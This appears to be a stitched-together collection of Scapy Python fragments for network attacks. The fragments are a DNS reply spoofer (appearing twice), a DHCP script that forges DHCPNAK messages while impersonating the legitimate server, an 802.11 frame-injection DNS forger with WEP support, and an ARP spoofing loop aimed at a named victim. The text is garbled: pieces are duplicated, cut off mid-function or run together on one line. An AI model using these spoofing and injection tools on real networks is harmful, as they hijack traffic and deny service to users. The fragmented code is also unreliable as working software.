def nak_request(pkt):
msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'], 2)
sendp(
Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst) /
IP(src=globals()['dhcp_server_ip'], dst=pkt[IP].dst) /
UDP(sport=67, dport=68) / BOOTP(op=2,
ciaddr=pkt[IP].src,
siaddr=pkt[IP].dst,
chaddr=pkt[Ether].src,
xid=pkt[BOOTP].xid) /
DHCP(options=[('server_id', globals()['dhcp_server_ip']),
('message-type', 'nak'), ('end')]))
def procPacket(p):
#Lets grab the source mac and dst mac
eth_layer = p.getlayer(scapy.Ether)
src_mac = eth_layer.src
dst_mac = eth_layer.dst
#Now on to grabbing the src IP and dst IP
ip_layer = p.getlayer(scapy.IP)
src_ip = ip_layer.src
dst_ip = ip_layer.dst
#Woot..UDP Layer
udp_layer = p.getlayer(scapy.UDP)
src_port = udp_layer.sport
dst_port = udp_layer.dport
#And finally..the DNS layer
dns_layer = p.getlayer(scapy.DNS)
d = scapy.DNS()
d.id = dns_layer.id #Transaction ID
d.qr = 1 #1 for Response
d.opcode = 16
d.aa = 0
d.tc = 0
d.rd = 0
d.ra = 1
d.z = 8
d.rcode = 0
d.qdcount = 1 #Question Count
d.ancount = 1 #Answer Count
d.nscount = 0 #No Name server info
d.arcount = 0 #No additional records
d.qd = str(dns_layer.qd)
d.an = scapy.DNSRR(rrname="www.google.com.",
ttl=330,
type="A",
rclass="IN",
rdata="127.0.0.1")
#Send the spoofed packet away!
#Don't forget to switch stuffs lawl
spoofed = scapy.Ether(src=dst_mac, dst=src_mac) / scapy.IP(
src=dst_ip, dst=src_ip) / scapy.UDP(sport=dst_port, dport=src_port) / d
#Off we go!
scapy.sendp(spoofed, iface_hint=src_ip)
def procPacket(p):
#Lets grab the source mac and dst mac
eth_layer = p.getlayer(scapy.Ether)
src_mac = eth_layer.src
dst_mac = eth_layer.dst
#Now on to grabbing the src IP and dst IP
ip_layer = p.getlayer(scapy.IP)
src_ip = ip_layer.src
dst_ip = ip_layer.dst
#Woot..UDP Layer
udp_layer = p.getlayer(scapy.UDP)
src_port = udp_layer.sport
dst_port = udp_layer.dport
#And finally..the DNS layer
dns_layer = p.getlayer(scapy.DNS)
d = scapy.DNS()
d.id = dns_layer.id #Transaction ID
d.qr = 1 #1 for Response
d.opcode = 16
d.aa = 0
d.tc = 0
d.rd = 0
d.ra = 1
d.z = 8
d.rcode = 0
d.qdcount = 1 #Question Count
d.ancount = 1 #Answer Count
d.nscount = 0 #No Name server info
d.arcount = 0 #No additional records
d.qd = str(dns_layer.qd)
d.an = scapy.DNSRR(rrname="www.google.com.", ttl=330, type="A", rclass="IN", rdata="127.0.0.1")
#Send the spoofed packet away!
#Don't forget to switch stuffs lawl
spoofed = scapy.Ether(src=dst_mac, dst=src_mac)/scapy.IP(src=dst_ip, dst=src_ip)/scapy.UDP(sport=dst_port, dport=src_port)/d
#Off we go!
scapy.sendp(spoofed, iface_hint=src_ip)
dst = dot11_frame.getlayer(IP).src,
ttl = TTL)
dot11_answer /= UDP(
sport = dot11_frame.getlayer(UDP).dport,
dport = dot11_frame.getlayer(UDP).sport)
dot11_answer /= DNS(
id = dot11_frame.getlayer(DNS).id,
qr = 1,
qd = dot11_frame.getlayer(DNS).qd,
an = DNSRR(
rrname = dot11_frame.getlayer(DNS).qd.qname,
ttl = 10,
rdata = IPDNS)
)
if DEBUG:
os.write(1,"Sending DNS Reply on %s\n" % OUT_IFACE)
if VERB:
os.write(1,"%s\n" % dot11_frame.summary())
# Frame injection :
sendp(dot11_answer,verbose=0) # Send frame
# Program killed
except KeyboardInterrupt:
print "Stopped by user."
s.close()
sys.exit()
dot11_answer.addr3 = SMAC
if WEP:
dot11_answer.FCfield |= 0x40
dot11_answer /= Dot11WEP(iv="111", keyid=KEYID)
dot11_answer /= (
LLC(ctrl=3) / SNAP() / IP(src=dot11_frame.getlayer(IP).dst, dst=dot11_frame.getlayer(IP).src, ttl=TTL)
)
dot11_answer /= UDP(sport=dot11_frame.getlayer(UDP).dport, dport=dot11_frame.getlayer(UDP).sport)
dot11_answer /= DNS(
id=dot11_frame.getlayer(DNS).id,
qr=1,
qd=dot11_frame.getlayer(DNS).qd,
an=DNSRR(rrname=dot11_frame.getlayer(DNS).qd.qname, ttl=10, rdata=IPDNS),
)
if DEBUG:
os.write(1, "Sending DNS Reply on %s\n" % OUT_IFACE)
if VERB:
os.write(1, "%s\n" % dot11_frame.summary())
# Frame injection :
sendp(dot11_answer, verbose=0) # Send frame
# Program killed
except KeyboardInterrupt:
print "Stopped by user."
s.close()
sys.exit()
# This array holds the MAC address from DHCP clients which have send a DHCPREQUEST. We use it to
# cross reference it with ARP packets to see from which DHCP server a lease was obtained.
macs = {}
def msg(string, level):
if globals()['verbose'] >= level:
print(string)
# Sending a DHCPDISCOVER to aquire the DHCP server IP.
msg("Sending DHCPDISCOVER packet to discover DHCP servers", 2)
sendp(
Ether(src="00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff") /
IP(src="0.0.0.0", dst="255.255.255.255") / UDP(sport=68, dport=67) /
BOOTP(chaddr="\x00\x00\x00\x00\x00\x00", xid=0x10000000) /
DHCP(options=[('message-type', 'discover'), ('end')]))
# Filtering out the DHCP server it's IP address, and storing it in a global variable. We ignore our
# own DHCP server via a bpf filter in the sniff command below.
def get_dhcp_server(pkt):
if pkt[DHCP] and pkt[DHCP].options[0][1] == 2:
globals()["dhcp_server_ip"] = pkt[IP].src
globals()["dhcp_server_mac"] = pkt[Ether].src
msg("Legit DHCP server found on " + globals()['dhcp_server_ip'], 1)
# Detecting DHCPREQUEST packets and ARP packets.
def detect_dhcp_request(pkt):
def nak_request(pkt):
msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'],2)
sendp(Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst)/
IP(src=globals()['dhcp_server_ip'],dst=pkt[IP].dst)/UDP(sport=67,dport=68)/
BOOTP(op=2, ciaddr=pkt[IP].src,siaddr=pkt[IP].dst,chaddr=pkt[Ether].src, xid=pkt[BOOTP].xid)/
DHCP(options=[('server_id',globals()['dhcp_server_ip']),('message-type','nak'), ('end')]))
# This array will hold the MAC from a DHCP client, and the number of times we have tried to spoof
# a DHCPNAK from the legit DHCP server.
attempted_dhcpnaks = {}
# This array holds the MAC address from DHCP clients which have send a DHCPREQUEST. We use it to
# cross reference it with ARP packets to see from which DHCP server a lease was obtained.
macs = {}
def msg(string, level):
if globals()['verbose'] >= level:
print(string)
# Sending a DHCPDISCOVER to aquire the DHCP server IP.
msg("Sending DHCPDISCOVER packet to discover DHCP servers",2)
sendp(Ether(src="00:00:00:00:00:00",dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")
/UDP(sport=68,dport=67)/BOOTP(chaddr="\x00\x00\x00\x00\x00\x00",xid=0x10000000)/
DHCP(options=[('message-type','discover'),('end')]))
# Filtering out the DHCP server it's IP address, and storing it in a global variable. We ignore our
# own DHCP server via a bpf filter in the sniff command below.
def get_dhcp_server(pkt):
if pkt[DHCP] and pkt[DHCP].options[0][1] == 2:
globals()["dhcp_server_ip"] = pkt[IP].src
globals()["dhcp_server_mac"] = pkt[Ether].src
msg("Legit DHCP server found on " + globals()['dhcp_server_ip'],1)
# Detecting DHCPREQUEST packets and ARP packets.
def detect_dhcp_request(pkt):
if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
msg("DHCPREQUEST detected from " + pkt[Ether].src,2)
globals()['macs'][pkt[Ether].src] = pkt[Ether].src
#!/usr/bin/python
import scapy,sys
if not len(sys.argv) == 2:
print "Must supply IP"
sys.exit(1)
victim = sys.argv[1]
network = victim[:victim.rfind(".")+1] + "%d"
tmac = scapy.getmacbyip(victim)
for i in range(255):
target = str(network % i)
if target == victim:
continue
p = scapy.Ether(dst=tmac)/scapy.ARP(op="who-has", psrc=target, pdst=victim)
scapy.sendp(p, iface_hint=target)
else: dot11_sent_frame.addr3 = SMAC if WEP: dot11_sent_frame.FCfield |= 0x40 dot11_sent_frame /= Dot11WEP( iv = "111", keyid = KEYID) dot11_sent_frame /= LLC(ctrl = 3)/SNAP(code=eth_rcvd_frame.getlayer(Ether).type)/eth_rcvd_frame.getlayer(Ether).payload if DEBUG: os.write(1,"Sending from-DS to %s\n" % OUT_IFACE) if VERB: os.write(1,"%s\n" % dot11_sent_frame.summary()) # Frame injection : sendp(dot11_sent_frame,verbose=0) # Send from-DS frame # Frame from WiFi network if s in r: # 802.11 maximum frame size is 2346 bytes (cf. RFC3580) # However, WiFi interfaces are always MTUed to 1500 dot11_rcvd_frame = s.recv(2346) # WEP handling is automagicly done by Scapy if conf.wepkey is set # Nothing to do to decrypt (although not yet tested) # WEP frames have Dot11WEP layer, others don't if DEBUG: if dot11_rcvd_frame.haslayer(Dot11WEP): # WEP frame os.write(1,"Received WEP from %s\n" % IN_IFACE)
